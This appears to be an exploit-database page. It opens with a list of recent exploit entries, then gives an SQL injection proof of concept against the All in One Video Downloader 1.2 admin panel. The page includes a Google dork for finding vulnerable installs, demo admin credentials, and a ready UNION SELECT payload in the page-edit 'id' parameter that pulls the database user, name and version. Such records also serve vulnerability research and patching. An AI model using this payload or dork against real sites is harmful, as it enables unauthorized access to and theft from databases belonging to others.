
19 changes to exploits/shellcodes Microsoft Edge 44.17763.1.0 - NULL Pointer Dereference BlueAuditor 1.7.2.0 - 'Key' Denial of Service (PoC) SpotFTP Password Recover 2.4.2 - 'Name' Denial of Service (PoC) Foscam Video Management System 1.1.4.9 - 'Username' Denial of Service (PoC) KioWare Server Version 4.9.6 - Weak Folder Permissions Privilege Escalation Mailcleaner - Authenticated Remote Code Execution (Metasploit) Embed Video Scripts - Persistent Cross-Site Scripting All in One Video Downloader 1.2 - Authenticated SQL Injection LayerBB 1.1.1 - Persistent Cross-Site Scripting MyBB OUGC Awards Plugin 1.8.3 - Persistent Cross-Site Scripting PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Scripting phpMoAdmin MongoDB GUI 1.1.5 - Cross-Site Request Forgery / Cross-Site Scripting Wordpress Plugin UserPro < 4.9.21 - User Registration Privilege Escalation MyT Project Management 1.5.1 - 'Charge[group_total]' SQL Injection Roxy Fileman 1.4.5 - Unrestricted File Upload / Directory Traversal Ajera Timesheets 9.10.16 - Deserialization of Untrusted Data Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - Cross-Site Request Forgery Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - JS/HTML Code Injection Huawei E5330 21.210.09.00.158 - Cross-Site Request Forgery (Send SMS)
20 lines
No EOL
789 B
Text
20 lines
No EOL
789 B
Text
# Exploit Title: All in One Video Downloader 1.2 - SQL Injection
|
|
# Google Dork: "developed by Niche Office"
|
|
# Date: 1 Jan 2019
|
|
# Exploit Author: Deyaa Muhammad
|
|
# Author EMail: contact [at] deyaa.me
|
|
# Author Blog: http://deyaa.me
|
|
# Vendor Homepage: https://nicheoffice.web.tr/
|
|
# Software Link: https://codecanyon.net/item/all-in-one-video-downloader-youtube-and-more/22599418
|
|
# Demo Website: https://aiovideodl.ml/
|
|
# Demo Admin Panel: https://aiovideodl.ml/admin/
|
|
# Demo Admin Credentials: demo@aiovideodl.ml/123456
|
|
# Version: 1.2
|
|
# Tested on: WIN7_x68/cloudflare
|
|
# CVE : N/A
|
|
|
|
# POC:
|
|
https://[PATH]/admin/?view=page-edit&id=2.9'+[SQLI]-- -
|
|
|
|
# Exploit:
|
|
https://[PATH]/admin/?view=page-edit&id=2.9'+UNION+SELECT+1,2,3,4,concat(user(),0x3a3a,database(),0x3a3a,version())-- - |